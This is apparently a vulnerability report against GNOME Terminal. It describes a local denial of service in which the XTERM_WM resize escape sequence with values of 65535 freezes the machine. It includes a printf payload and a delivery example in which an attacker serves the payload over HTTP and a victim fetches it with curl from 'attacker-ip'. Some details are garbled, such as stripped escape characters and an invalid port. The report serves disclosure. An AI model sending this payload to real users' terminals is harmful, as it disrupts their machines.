Limit XTERM_WM resize number of rows and columns
Original reporter: Siddharth Dushantha
Area: Application
Message
The ANSI escape sequence "e[4;;t" can be used to resize the terminal window, where "" is the height and ""is the width. By providing a large number such as 65535 for both values will lead to a local denial of service, where the whole machine can be frozen.
This same vulnerability found was in XTerm back in 2000. The CVE for the vulnerability in XTerm is CVE-2000-0476
Steps to reproduce:
- Open gnome-terminal
- Execute
printf "e[4;65535;65535t"
in the terminal
Depending on the amount of memory on your machine, you will either experience the terminal window being frozen or the whole machine being frozen. When tested in a Kali Linux virtual machine, the whole machine froze and then the user got logged out.
An attacker can use this vulnerability to temporarily render someone's machine useless In the example above, the victim executed the escape sequences themselves. An attacker can deliver this payload to the victim by hosting it in a file and having the victim use curl or similar to fetch the file.
attacker$ printf "e[4;65535;65535t" > index.html attacker$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
victim$ curl attacker-ip:80000 #everything will stop working
System info: OS: Kali Linux GNOME Terminal version: GNOME Terminal 3.52.1 using VTE 0.75.92 +BIDI +GNUTLS +ICU +SYSTEMD